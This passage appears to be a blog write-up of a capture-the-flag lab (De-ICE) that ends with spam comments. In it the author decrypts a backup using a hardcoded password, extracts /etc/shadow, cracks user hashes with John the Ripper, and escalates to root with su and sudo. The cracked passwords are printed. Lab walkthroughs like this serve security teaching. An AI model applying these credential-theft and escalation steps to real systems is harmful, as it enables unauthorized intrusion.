NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;

[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}

tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt

gzip --best -f ${TMPBACKUP}/${FILENAME}

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

mv ${TMPBACKUP}/${FILENAME}.gz.enc ./

rm -fr ${TMPBACKUP}

root@kali:~# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 23:42:00 2013, max compression

root@kali:~# tar tvzf backup_webhost_130111.tar.gz
drwxr-xr-x root/root         0 2013-05-13 22:57 etc/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/ssh/
-rw-r--r-- root/root    125749 2013-01-11 23:42 etc/ssh/moduli
-rw-r--r-- root/root       302 2013-01-11 23:42 etc/ssh/ssh_import_id
-rw-r--r-- root/root      1669 2013-01-11 23:42 etc/ssh/ssh_config
-rw-r--r-- root/root      3924 2013-01-11 23:42 etc/ssh/sshd_config
-rw------- root/root      1374 2013-01-11 23:42 etc/shadow-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/
-rwxr-xr-x root/root      1020 2013-01-11 23:42 etc/security/namespace.init
-rw-r--r-- root/root      1442 2013-01-11 23:42 etc/security/namespace.conf
-rw------- root/root         0 2013-01-11 23:42 etc/security/opasswd
-rw-r--r-- root/root      3635 2013-01-11 23:42 etc/security/group.conf
-rw-r--r-- root/root      4620 2013-01-11 23:42 etc/security/access.conf
-rw-r--r-- root/root       419 2013-01-11 23:42 etc/security/sepermit.conf
-rw-r--r-- root/root      2151 2013-01-11 23:42 etc/security/limits.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/namespace.d/
-rw-r--r-- root/root      2980 2013-01-11 23:42 etc/security/pam_env.conf
-rw-r--r-- root/root      2180 2013-01-11 23:42 etc/security/time.conf
-rw-r--r-- root/root      1795 2013-01-11 23:42 etc/security/capability.conf
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/security/limits.d/
-rw-r--r-- root/root       728 2013-01-11 23:42 etc/group
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/skel/
-rw-r--r-- root/root       675 2012-04-03 17:58 etc/skel/.profile
-rw-r--r-- root/root       220 2012-04-03 17:58 etc/skel/.bash_logout
-rw-r--r-- root/root      3486 2012-04-03 17:58 etc/skel/.bashrc
-rw------- root/root       881 2013-01-11 23:42 etc/group-
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sudoers.d/
-r--r----- root/root       753 2013-01-11 23:42 etc/sudoers.d/README
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/grub.d/
-rwxr-xr-x root/root      6743 2013-01-11 23:42 etc/grub.d/00_header
-rwxr-xr-x root/root       214 2013-01-11 23:42 etc/grub.d/40_custom
-rwxr-xr-x root/root      5522 2013-01-11 23:42 etc/grub.d/05_debian_theme
-rwxr-xr-x root/root      7780 2013-01-11 23:42 etc/grub.d/10_linux
-rwxr-xr-x root/root      6335 2013-01-11 23:42 etc/grub.d/20_linux_xen
-rwxr-xr-x root/root        95 2013-01-11 23:42 etc/grub.d/41_custom
-rwxr-xr-x root/root      1588 2013-01-11 23:42 etc/grub.d/20_memtest86+
-rwxr-xr-x root/root      7603 2013-01-11 23:42 etc/grub.d/30_os-prober
-rw-r--r-- root/root       483 2013-01-11 23:42 etc/grub.d/README
-rwxr-xr-x root/root      1388 2013-01-11 23:42 etc/grub.d/30_uefi-firmware
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sgml/
-rw-r--r-- root/root       366 2013-01-11 23:42 etc/sgml/catalog
-rw-r--r-- root/root       391 2013-01-11 23:42 etc/sgml/xml-core.cat
-rw-r--r-- root/root       335 2013-01-11 23:42 etc/sgml/catalog.old
-rw-r--r-- root/root       743 2013-01-11 23:42 etc/fstab
-rw-r--r-- root/root      2845 2013-01-11 23:42 etc/sysctl.conf
-rw-r--r-- root/root        65 2013-01-11 23:42 etc/hosts
-rw-r--r-- root/root      3343 2013-01-11 23:42 etc/gai.conf
-rw-rw---- root/sasl     12288 2013-01-11 23:42 etc/sasldb2
-r--r----- root/root       724 2013-01-11 23:42 etc/sudoers
-rw-r--r-- root/root        19 2013-01-11 23:42 etc/su-to-rootrc
-rw-r--r-- root/root      3902 2013-01-11 23:42 etc/securetty
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/groff/
-rw-r--r-- root/root       848 2013-01-11 23:42 etc/groff/mdoc.local
-rw-r--r-- root/root       854 2013-01-11 23:42 etc/groff/man.local
-rw-r--r-- root/root     19281 2013-01-11 23:42 etc/services
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/systemd/system/multi-user.target.wants/
lrwxrwxrwx root/root         0 2012-12-06 23:55 etc/systemd/system/multi-user.target.wants/rsyslog.service -> /lib/systemd/system/rsyslog.service
-rw-r----- root/shadow    1056 2013-01-11 23:42 etc/shadow
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/sysctl.d/
-rw-r--r-- root/root      1292 2013-01-11 23:42 etc/sysctl.d/10-ptrace.conf
-rw-r--r-- root/root       726 2013-01-11 23:42 etc/sysctl.d/10-kernel-hardening.conf
-rw-r--r-- root/root       519 2013-01-11 23:42 etc/sysctl.d/README
-rw-r--r-- root/root       490 2013-01-11 23:42 etc/sysctl.d/10-ipv6-privacy.conf
-rw-r--r-- root/root       509 2013-01-11 23:42 etc/sysctl.d/10-network-security.conf
-rw-r--r-- root/root        77 2013-01-11 23:42 etc/sysctl.d/10-console-messages.conf
-rw-r--r-- root/root       506 2013-01-11 23:42 etc/sysctl.d/10-zeropage.conf
-rw-r--r-- root/root        87 2013-01-11 23:42 etc/shells
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.defaults/%gconf-tree.xml
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/2/
-rw-r--r-- root/root      3397 2013-01-11 23:42 etc/gconf/2/evoldap.conf
-rw-r--r-- root/root      1421 2013-01-11 23:42 etc/gconf/2/path
drwxr-xr-x root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/
-rw-r--r-- root/root         0 2013-01-11 23:42 etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
-rw-r--r-- root/root      1194 2013-01-11 23:42 etc/passwd

root@kali:~# mkdir webhost
root@kali:~# mv backup_webhost_130111.tar.gz webhost/
root@kali:~# cd webhost
root@kali:~/webhost# tar xvzf backup_webhost_130111.tar.gz

root@kali:~/webhost# john etc/shadow-
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt [32/32])
rhedley          (rhedley)
mbrown           (mbrown)
mparker          (mparker)
swillard         (swillard)
guesses: 4  time: 0:00:00:00 DONE (Wed Jan  8 11:12:15 2014)  c/s: 50.00  trying: swillard

root@kali:~/webhost# cat etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:sraines
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
fuse:x:104:
messagebus:x:105:
whoopsie:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
netdev:x:110:
lpadmin:x:111:
sambashare:x:112:
ssl-cert:x:114:
postdrop:x:117:
memcache:x:118:
sraines:x:1000:
mbrown:x:1001:
rhedley:x:1002:

root@kali:~/webhost# john etc/shadow --wordlist=/usr/share/wordlists/darkc0de.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 3 password hashes with 3 different salts (sha512crypt [32/32])
Remaining 1 password hash
brillantissimo   (sraines)
guesses: 1  time: 0:00:36:46 DONE (Wed Jan  8 12:22:24 2014)  c/s: 268  trying: brillantissimo
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~# ssh -i downloadkey mbrown@192.168.56.101
mbrown@webhost:~$ su sraines
Unknown id: sraines
mbrown@webhost:~$ su swillard
Password:
swillard@webhost:/home/mbrown$ sudo -l
[sudo] password for swillard:
Matching Defaults entries for swillard on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User swillard may run the following commands on this host:
    (ALL : ALL) ALL

swillard@webhost:/home/mbrown$ ls /root
ls: cannot open directory /root: Permission denied
swillard@webhost:/home/mbrown$ sudo ls /root
cleanlogs.sh  secret.jpg
swillard@webhost:/home/mbrown$

That's all.

Some hint from here: http://blog.techorganic.com/2013/12/de-ice-hacking-challenge-part-6.html

2 megjegyzés:

  1. If you need your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (even if they're dating somebody else now) you got to watch this video
    right away...

    (VIDEO) Text Your Ex Back?

    VálaszTörlés
  2. BlueHost is ultimately one of the best website hosting company for any hosting services you might require.

    VálaszTörlés